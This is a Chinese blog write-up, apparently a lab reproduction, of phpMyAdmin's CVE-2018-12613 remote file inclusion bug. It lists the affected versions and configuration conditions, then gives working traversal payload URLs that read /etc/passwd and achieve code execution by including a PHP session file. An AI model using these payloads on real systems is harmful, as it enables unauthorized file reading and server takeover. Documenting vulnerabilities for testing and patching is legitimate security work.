phpmyadmin 远程文件包含漏洞(CVE-2018-12613)

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

漏洞记录

漏洞编号:CVE-2018-12613

受影响版本:phpMyAdmin 4.8.0和4.8.1受到影响。

利用条件:
攻击者必须经过身份验证,但在这些情况下除外:
(/libraries/config.default.php)

  • $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码
  • $ cfg [‘ServerDefault’] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码
  • 漏洞分析
    https://blog.csdn.net/qq_33020901/article/details/80829269

漏洞利用

访问下面的payload

http://192.168.1.15:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

可见/etc/passwd被读取,说明文件包含漏洞存在:
在这里插入图片描述
目前有几种getshell的方法,有的是上传sql文件,然后包含mysql的sql文件,有的是开启general_log来完成getshell,现在使用今天这种操作。利用方式也比较简单,可以执行一下SELECT ‘<?=phpinfo()?>’;,然后查看自己的sessionid(cookiephpMyAdmin的值),然后包含session文件即可:
在这里插入图片描述

http://192.168.1.15:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_0452064cb94eaca79f085df69ffbb2c2

在这里插入图片描述

参考链接:在这里插入图片描述
https://blog.csdn.net/qq_33020901/article/details/80829269

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值